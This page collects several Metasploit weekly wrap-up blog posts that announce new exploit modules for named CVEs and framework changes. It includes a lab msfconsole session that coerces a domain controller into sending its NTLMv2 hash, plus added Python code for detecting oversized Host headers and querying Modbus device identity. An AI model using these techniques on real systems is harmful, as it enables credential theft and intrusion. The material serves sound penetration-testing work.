All posts by Dean Welch

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966, a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies, which can be hijacked if found.
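Since the leak described above is triggered by a Host header far larger than any real hostname, a defender-side pre-filter can flag such requests before they reach the appliance. The following is an added example written for this wrap-up, not Metasploit or Citrix code; the 300-byte bound and the sample requests are constructed assumptions.

```python
"""Flag HTTP requests whose Host header is implausibly large.

Added example, not Metasploit or Citrix code. The page describes the
CVE-2023-4966 leak being triggered by a very large HTTP Host header; no
legitimate hostname comes anywhere near that size, so a reverse proxy,
WAF rule or log check can flag requests by Host header length alone.
"""
from __future__ import annotations

# Assumption: a DNS hostname is at most 253 characters and a host:port pair
# only a little longer, so anything above this bound cannot be a real name.
HOST_LEN_LIMIT = 300


def parse_request_headers(raw: bytes) -> list[tuple[str, str]]:
    """Return (name, value) pairs from the header block of a raw HTTP request.

    Names are lower-cased so "host" and "Host" match; obs-fold continuation
    lines are joined onto the previous header so a folded Host header is
    measured as one value rather than being split into harmless pieces.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")[1:]  # drop the request line
    headers: list[tuple[str, str]] = []
    for line in lines:
        if line[:1] in (b" ", b"\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip().decode("latin-1"))
            continue
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return headers


def host_header_length(raw: bytes) -> int:
    """Length of the largest Host header in the request (0 if absent).

    Duplicate Host headers are reduced to the maximum so an oversized second
    copy cannot hide behind a benign first one.
    """
    return max((len(v) for n, v in parse_request_headers(raw) if n == "host"),
               default=0)


def is_oversized_host(raw: bytes, limit: int = HOST_LEN_LIMIT) -> bool:
    """True when the request's Host header exceeds the configured bound."""
    return host_header_length(raw) > limit


def scan_requests(requests: list[bytes],
                  limit: int = HOST_LEN_LIMIT) -> list[tuple[int, int]]:
    """Return (index, host_length) for every request exceeding the limit."""
    hits = []
    for i, r in enumerate(requests):
        length = host_header_length(r)
        if length > limit:
            hits.append((i, length))
    return hits


# Constructed sample traffic: a benign request, a benign host:port, and one
# carrying a Host header far larger than any hostname (the shape the page
# describes; no product-specific path or trigger size is used).
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.1\r\nHost: vpn.example.test\r\nUser-Agent: x\r\n\r\n",
    b"GET /login HTTP/1.1\r\nhost: vpn.example.test:443\r\n\r\n",
    b"GET /leak HTTP/1.1\r\nHost: " + b"a" * 5000 + b"\r\n\r\n",
]

if __name__ == "__main__":
    for idx, length in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: Host header is {length} bytes, "
              f"over the {HOST_LEN_LIMIT}-byte bound")
```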

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at-rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/07/07/metasploit-weekly-wrap-up-18/

Apache RocketMQ

We saw some great teamwork this week from jheysel-r7 and h00die to bring you an exploit module for CVE-2023-33246.
In Apache RocketMQ version 5.1.0 and under, there is an access control issue which the module leverages to update the broker’s configuration file without authentication. From here we can gain remote code execution as whichever user is running the service.

New module content (1)

Apache RocketMQ update config RCE

Authors: Malayke, h00die, and jheysel-r7
Type: Exploit
Pull request: #18082 contributed by jheysel-r7
AttackerKB reference: CVE-2023-33246

Description: This adds an exploit module that leverages an RCE in Apache RocketMQ. Due to an access control issue, one can update the Broker’s configuration file without authentication and obtain remote code execution in the context of the user running Apache RocketMQ. This vulnerability is identified as CVE-2023-33246.

Enhancements and features (4)

  • #18122 from h00die – This adds a library that provides methods for working with Apache RocketMQ.
  • #18144 from rorymckinley – Updates the capture plugin to be more helpful, and adds additional documentation. This passive capture plugin can be used with load capture and run with captureg --help.
  • #18147 from adfoster-r7 – Adds support for Ruby 3.3.0-preview1.
  • #18153 from adfoster-r7 – Removes Ruby 2.7 from Metasploit’s automated test suite. Ruby 2.7 has been officially marked as end-of-life by the maintainers. Users are recommended to upgrade to Ruby 3.x with a Ruby version manager or similar.

Bugs fixed (2)

  • #18152 from adfoster-r7 – This fixes a bug where the PHP Meterpreter would show the incorrect file size for very large files.
  • #18166 from dwelch-r7 – Fixes a crash when running the show payloads command for a module that supports encrypted payloads on a machine that doesn’t have a Mingw compiler available.

Documentation added (1)

  • #18169 from adfoster-r7 – Additional documentation has been added to the Metasploit Wiki to explain how plugins work.

You can always find more documentation on our docsite at docs.metasploit.com.

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/04/21/metasploit-weekly-wrap-up-7/

VMware Workspace ONE Access exploit chain

A new module contributed by jheysel-r7 exploits two vulnerabilities in VMware Workspace ONE Access to attain Remote Code Execution as the horizon user.
The first is CVE-2022-22956, an authentication bypass, and the second is a JDBC injection, CVE-2022-22957, which ultimately grants us RCE.
The module will seamlessly chain these two vulnerabilities together, simplifying the whole process.

More speeeeeeed!

Our own adfoster-r7 has added caching to Ruby’s load path logic with the help of bootsnap to improve the bootup performance of Metasploit.
On the hardware we tested, boot time dropped by an average of 2-3 seconds, which is a really nice quality-of-life improvement.

New module content (3)

VMware Workspace ONE Access VMSA-2022-0011 exploit chain

Authors: jheysel-r7 and mr_me
Type: Exploit
Pull request: #17854 contributed by jheysel-r7
AttackerKB reference: CVE-2022-22957, CVE-2022-22956

Description: This PR adds an exploit chaining CVE-2022-22956 and CVE-2022-22957 to gain code execution as the horizon user on VMware Workspace ONE Access. The first vulnerability, CVE-2022-22956, is an authentication bypass in OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability, CVE-2022-22957, is a JDBC injection RCE, specifically in the DBConnectionCheckController class’s dbCheck method, which allows an attacker to deserialize arbitrary Java objects and so achieve remote code execution.

VMware Workspace ONE Access CVE-2022-22960

Authors: jheysel-r7 and mr_me
Type: Exploit
Pull request: #17874 contributed by jheysel-r7
AttackerKB reference: CVE-2022-22960

Description: This PR adds an exploit module targeting CVE-2022-22960, which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access.

SPIP form PHP Injection

Authors: Julien Voisin, Laluka, and coiffeur
Type: Exploit
Pull request: #17711 contributed by jvoisin
AttackerKB reference: CVE-2023-27372

Description: This module exploits a PHP code injection in SPIP. The vulnerability exists in the oubli parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.

Enhancements and features (4)

  • #17809 from adfoster-r7 – Adds caching to Ruby’s load path logic to improve the bootup performance of msfconsole on startup, averaging 2-3 seconds faster boot time on the tested hardware.
  • #17820 from manishkumarr1017 – This PR fixes the Nagios XI authenticated modules to work even when autocheck is disabled, and refactors reusable code.
  • #17884 from adfoster-r7 – Adds database migration validation before attempting to run the test suite. Users who have not migrated their local test database will be notified of the steps required to resolve this issue.
  • #17892 from h00die – Adds additional documentation for the exploit/windows/misc/unified_remote_rce module.

Bugs fixed (7)

  • #17873 from zgoldman-r7 – Updates the scanner/ftp/ftp_login module to ensure that opened connections are correctly closed after attempting to log in. Additionally, this fixes a bug where the FTPTimeout option was being ignored after being set by a user.
  • #17882 from zeroSteiner – A bug has been fixed in the getsystem command where getsystem techniques 5 and 6 were crashing sessions on Windows 11 22H2. Additionally, Python Windows Meterpreter payloads have been updated to include memory lock/unlock abilities.
  • #17883 from adfoster-r7 – Fixes a crash when running the modules/auxiliary/scanner/lotus/lotus_domino_hashes module and the database is not active.
  • #17888 from bcoles – Fixes a crash when running the help setg command in msfconsole.
  • #17893 from h00die – Updates the documentation for the modules/exploit/linux/local/asan_suid_executable_priv_esc module to be in the correct location.
  • #17907 from jheysel-r7 – Fixes a crash when running the exploits/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain.rb module.
  • #17909 from adfoster-r7 – Fixes a Windows7 Meterpreter crash when in debug mode.

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/02/03/metasploit-weekly-wrap-up-191/

Metasploit 6.3 is out!

Earlier this week we announced the release of Metasploit 6.3 which came with a tonne of new modules and improvements.
The whole team worked super hard on this and we’re very excited that everyone can now get their hands on it and all of the new features it has to offer!
I won’t go over everything we did here because we have a whole separate blog post dedicated to the 6.3 release that you should check out if you missed it.

Dirty Cow available on macOS

We have a new module provided by timwr to exploit Dirty Cow on macOS. This module exploits a race condition in the kernel that gives the opportunity for a user to get code execution as root.

New module content (5)

CWP login.php Unauthenticated RCE

Authors: Numan Türle and Spencer McIntyre
Type: Exploit
Pull request: #17511 contributed by zeroSteiner
AttackerKB reference: CVE-2022-44877

Description: Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

io_uring Same Type Object Reuse Priv Esc

Authors: Mathias Krause, Ryota Shiga, and h00die
Type: Exploit
Pull request: #17301 contributed by h00die
AttackerKB reference: CVE-2022-1043

Description: This module exploits Linux LPE CVE-2022-1043, a bug in io_uring leading to an additional put_cred() that can be exploited to hijack credentials of other processes.

vmwgfx Driver File Descriptor Handling Priv Esc

Authors: Mathias Krause and h00die
Type: Exploit
Pull request: #17300 contributed by h00die
AttackerKB reference: CVE-2022-22942

Description: This PR adds a Linux privilege escalation against VMware virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMware driver bug.

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Authors: Ian Beer, Zhuowei Zhang, and timwr
Type: Exploit
Pull request: #17415 contributed by timwr
AttackerKB reference: CVE-2022-46689

Description: This module is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root.

Veeam Backup and Replication Credentials Dump

Author: npm
Type: Post
Pull request: #17406 contributed by npm-cesium137-io

Description: Post-exploitation credential capture module for Veeam Backup & Recovery and Veeam ONE Monitor versions 9.x – 11.x.

Enhancements and features (11)

  • #16946 from cgranleese-r7 – Updates the show targets and show actions command to display a visual indicator beside the currently selected value.
  • #17481 from h00die – An update has been made to the modules/auxiliary/scanner/http/options.rb module to modernize a few of its options, tidy up the code, and to handle an edge case when a target server might respond with a Tomcat error page.
  • #17504 from ErikWynter – Two aliases for show favorites have been added, namely favorite -l and favorites, to allow for easier listing of modules that users have marked as their favorites.
  • #17559 from cgranleese-r7 – Adds support for Ruby 3.2.
  • #17560 from adfoster-r7 – Updates the Kerberos inspect_ticket module to show unsupported pac buffer ul_types in a clearer way to the user.
  • #17563 from bcoles – Improves documentation and code quality for modules/exploits/multi/local.
  • #17564 from serializingme – Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module.
  • #17570 from zeroSteiner – The list of default queries used by the ldap_query module has been updated to add in the ENUM_DOMAIN and ENUM_MACHINE_ACCOUNT_QUOTA queries and to make some small updates to existing queries.
  • #17575 from zeroSteiner – Updates the Kerberos ccache functionality to automatically perform sname switching on Service Tickets when the ticket sname does not match the Metasploit module’s required sname. This allows for a service ticket associated with the SPN service_a/host.domain.local to be used and updated to service_b/host.domain.local dynamically as part of service authentication.
  • #17577 from bcoles – Updates modules/exploits/qnx to run the check command before attempting to exploit the target.
  • #17581 from bcoles – This PR modifies the conditions in 45 local privilege escalation modules to check whether the operator set ForceExploit to true before checking the permissions required for exploitation on the remote target, which is more efficient and quieter over the network.

Bugs fixed (4)

  • #17444 from hamax97 – A bug has been fixed whereby issuing a command line argument that contained nested equals signs would not be parsed correctly, and would instead be treated as two separate command line statements.
  • #17557 from zeroSteiner – This fixes the logon timestamp in the MS14-068 exploit so the generated ticket works.
  • #17558 from cgranleese-r7 – Fixes running msfconsole’s analyze command crashing when a WinRM session was opened.
  • #17561 from gwillcox-r7 – This fixes the direction for some Railgun function definitions in iphlpapi.

Documentation added (1)

  • #17565 from adfoster-r7 – Updates the docs site to add color to Metasploit console examples.

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/09/30/metasploit-weekly-wrap-up-178/

Veritas Backup Exec Agent RCE

This module, kindly provided by c0rs, targets the Veritas Backup Exec Agent in order to gain RCE as the system/root user.
The exploit itself is actually a chain of 3 separate CVEs (CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878), which only makes it more impressive.
While you’re patching, why not take the time to test your backups too?

Hikvision IP Camera user impersonation

This vulnerability has been present in Hikvision products since 2014 and comes to us courtesy of h00die-gr3y.
The main culprit here is Hikvision’s authentication mechanism, which allows you to log in as any valid user using only their username; from that point, this module lets you set a new password for the chosen username, so you can then log in "legitimately".

New module content (6)

  • Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic by Monte Crypto and h00die-gr3y, which exploits CVE-2017-7921 – A new module has been added in for CVE-2017-7921, an improper authentication logic bug in HikVision cameras. Successfully exploiting this vulnerability allows unauthenticated attackers to impersonate any valid user on the affected camera, which can be used to gain full control over the camera.
  • Netfilter nft_set_elem_init Heap Overflow Privilege Escalation by Arthur Mongodin and Redouane NIBOUCHA, which exploits CVE-2022-34918 – This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.
  • qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE) by Giacomo Casoni, Leon Trappett (thepcn3rd), and Rishal Dwivedi (Loginsoft), which exploits CVE-2020-7246 – Adds an exploit that targets an authenticated arbitrary file upload vulnerability to gain code execution on qdPM 9.1 and lower.
  • Veritas Backup Exec Agent Remote Code Execution by Alexander Korotin, which exploits CVE-2021-27878 – This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user.
  • Mobile Mouse RCE by CHOKRI HAMMEDI and h00die – This PR includes a module that uses default configuration in Unified Remote to spawn a run prompt and return a shell.
  • Wifi Mouse RCE by H4RK3NZ0, REDHATAUGUST, and h00die, which exploits CVE-2022-3218 – A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).

Enhancements and features (2)

  • #16981 from bcoles – This PR fixes several bugs as well as style and documentation inconsistencies, and implements new library methods.
  • #17048 from bcoles – This PR updates the enum_token module by adding documentation, clarifying the description, improving efficiency, and leveraging library code.

Bugs fixed (3)

  • #16994 from zeroSteiner – Fixes multiple issues with registry manipulation on opened sessions.
  • #17054 from zeroSteiner – Fixes a crash when using the info and generate commands for adapted single (unstaged) payloads – such as cmd/windows/powershell/meterpreter/reverse_tcp.
  • #17073 from cgranleese-r7 – Fixes a bug where sessions opened by running one of the rexec_login / rlogin_login / rsh_login modules would die after module completion.

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/07/08/metasploit-weekly-wrap-up-165/

DFSCoerce – Distributing more than just files

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:[truncated]
[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

FreeSwitch Brute Force Login

A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

New module content (2)

  • DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
  • FreeSWITCH Event Socket Login by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSWITCH event socket service login interface to guess the password.

Enhancements and features (1)

  • #16716 from bcoles – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

Bugs fixed (3)

  • #16704 from gwillcox-r7 – This fixes an issue when targeting some faulty memcached servers that return an error when extracting the keys and values stored in slabs. The module no longer errors out with a type conversion error.
  • #16724 from bcoles – This updates and fixes the exploit/windows/iis/ms01_026_dbldecode module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
  • #16731 from space-r7 – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/04/22/https-www-rapid7-com-blog-post-2022-04-01-metasploit-weekly-wrap-up-158/

ManageEngine ADSelfService Plus Authenticated RCE

This module is pretty exciting for us because it’s for a vulnerability discovered by our very own Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.
The vulnerability allowed attackers to leverage the "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords.
I won’t go into too much depth though because we have a whole blog post here for you to check out with all the details!
Oh, and I almost forgot to mention this module comes with a brand new jjs_reverse_tcp payload too.

Who watches the watch_queue?

This week we’ve also brought you an LPE for Linux via the watch_queue event notification system.
The module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18, but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.

New module content (2)

Enhancements and features (6)

  • #16437 from h00die – Adds ESXi as a recognizable type on ssh_login.
  • #16438 from h00die – Some SMTP servers only give out credentials when prompted. Now, the module option ‘AUTHPROMPT’ exists to indicate whether or not the auth prompt is required by the server.
  • #16446 from zeroSteiner – This updates the code for compatibility with the latest RubySMB 3.1 gem.
  • #16458 from bcoles – The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.
  • #16476 from bcoles – The tools/dev/msftidy.rb tool has been updated to recommend using CVE datastore references over the cve.mitre.org URL references since this is more maintainable in the long run and will assist transitioning things when CVE transitions to cve.org later this year.
  • #16477 from bcoles – This PR updates several modules to remove hardcoded URL references to the soon to be deprecated cve.mitre.org site, and where applicable, add in CVE references in place of these hardcoded URL references.

Bugs fixed (5)

  • #16318 from heyder – Adds support for old key exchange algorithms in the net/ssh library by setting append_all_supported_algorithms to true.
  • #16379 from heyder – Refactored a number of modules to use ssh_client_defaults.
  • #16426 from usiegl00 – This fixes a crash in OSX Meterpreter’s stager caused by mangled dyld functions in macOS Monterey.
  • #16457 from jmartin-r7 – Recent updates in Rex::Parser::Arguments regressed the ability to have short flags with multiple characters. This restores functionality by updating the spec checks and library code to appropriately parse multiple character short flags and each individual short flag specified in a combined short flag.
  • #16479 from cdelafuente-r7 – Meterpreter’s reg setval command has been updated to allow setting a REG_BINARY key value with the -d option with an arbitrarily long binary blob. Previously, this value was treated as a string, which led to an incorrect value being set in the registry field.

Metasploit weekly wrap-up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/01/28/metasploit-wrap-up-146/

I’m sure you know what’s coming, more Log4Shell

For those wondering when the Log4Shell remediation nightmare will end, I’m afraid I can’t give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module’s check function since scanners detecting header injection may not work.

A new getsystem technique for Meterpreter

smashery has done an amazing job working on giving us a fifth getsystem technique on the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem techniques, this one also has the advantage of not starting services, which is often an action that is identified as malicious. Users can run this elevation technique directly by using the getsystem -t 5 command in Meterpreter. Now exploits that yield sessions with LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.

New module content (2)

  • Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 – A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to root level code execution.
  • UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 – A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.

Enhancements and features

  • #15904 from smashery – This PR adds the logic to support a fifth getsystem option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
  • #16020 from VanSnitza – The exploit/scanner/auxiliary/scada/modbusclient module has been enhanced to support command 0x2B which gives clear text info about a device. Additionally the module’s code has been updated to comply with RuboCop standards.
  • #16090 from audibleblink – A new method user_data_directory has been added to lib/msf/base/config.rb to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
  • #16096 from zeroSteiner – The implementation of the ReverseListenerComm and ListenerComm datastore options have now been updated to support specifying -1 to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
  • #16106 from bwatters-r7 – This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.
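Function code 0x2B with MEI type 0x0E is Modbus Read Device Identification. As an added example, not the modbusclient module’s own code, the following Python frames that request over Modbus/TCP and parses a reply. The device reply bytes are constructed here and the vendor strings are made up; the socket helper at the end is the only part that touches a network.

```python
"""Added example: Modbus/TCP Read Device Identification (function 0x2B, MEI type
0x0E) framing and parsing. Not the modbusclient module's code; the sample
response bytes below are constructed."""
import socket
import struct

FC_READ_DEVICE_ID = 0x2B
MEI_DEVICE_ID = 0x0E
OBJECT_NAMES = {0x00: "VendorName", 0x01: "ProductCode", 0x02: "MajorMinorRevision",
                0x03: "VendorUrl", 0x04: "ProductName", 0x05: "ModelName",
                0x06: "UserApplicationName"}


def mbap(transaction_id: int, unit_id: int, pdu: bytes) -> bytes:
    """MBAP header: transaction id, protocol id 0, length = unit id byte + PDU."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def build_read_device_id(transaction_id: int, unit_id: int = 1,
                         read_code: int = 0x01, object_id: int = 0x00) -> bytes:
    """read_code 0x01 basic, 0x02 regular, 0x03 extended, 0x04 one specific object."""
    return mbap(transaction_id, unit_id,
                bytes([FC_READ_DEVICE_ID, MEI_DEVICE_ID, read_code, object_id]))


def parse_read_device_id(frame: bytes) -> dict:
    """Parse one response frame; raises ValueError on exception or malformed frames."""
    if len(frame) < 9:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:]
    if proto != 0 or len(pdu) != length - 1:
        raise ValueError("bad MBAP header")
    if pdu[0] == FC_READ_DEVICE_ID | 0x80:
        # Exception response: function code with the high bit set, then the code.
        raise ValueError(f"Modbus exception 0x{pdu[1]:02x} (0x01 = function unsupported)")
    if pdu[0] != FC_READ_DEVICE_ID or pdu[1] != MEI_DEVICE_ID:
        raise ValueError("not a Read Device Identification response")
    read_code, conformity, more, next_id, count = pdu[2:7]
    objects, off = {}, 7
    for _ in range(count):
        if off + 2 > len(pdu):
            raise ValueError("truncated object header")
        oid, olen = pdu[off], pdu[off + 1]
        value = pdu[off + 2:off + 2 + olen]
        if len(value) != olen:
            raise ValueError("truncated object value")
        objects[OBJECT_NAMES.get(oid, f"object_0x{oid:02x}")] = value.decode("ascii", "replace")
        off += 2 + olen
    return {"transaction_id": tid, "unit_id": unit, "read_code": read_code,
            "conformity": conformity, "more_follows": more == 0xFF,
            "next_object_id": next_id, "objects": objects}


def build_sample_response(transaction_id: int = 1, unit_id: int = 1) -> bytes:
    """Constructed device reply carrying the three mandatory basic objects."""
    objs = [(0x00, b"Acme Controls"), (0x01, b"PLC-100"), (0x02, b"v2.3")]
    body = b"".join(bytes([oid, len(val)]) + val for oid, val in objs)
    # read code 0x01, conformity 0x01 (basic), more follows 0x00, next object 0x00
    pdu = bytes([FC_READ_DEVICE_ID, MEI_DEVICE_ID, 0x01, 0x01, 0x00, 0x00, len(objs)]) + body
    return mbap(transaction_id, unit_id, pdu)


def query_device_id(host: str, port: int = 502, unit_id: int = 1, timeout: float = 3.0) -> dict:
    """Send one basic request over TCP and parse the reply. Not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_read_device_id(1, unit_id))
        return parse_read_device_id(sock.recv(260))


if __name__ == "__main__":
    print(build_read_device_id(7).hex())
    print(parse_read_device_id(build_sample_response()))
```

Modbus has no authentication, so network reach is the only thing gating this query. On a real assessment send a single request per device with a timeout: devices that do not implement function 0x2B answer with exception code 0x01 or not at all, and the parser above treats both the exception and a truncated reply as errors rather than partial results.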

Bugs fixed

  • #16054 from namaenonaimumei – This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
  • #16104 from zeroSteiner – Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/

We just couldn’t contain ourselves!

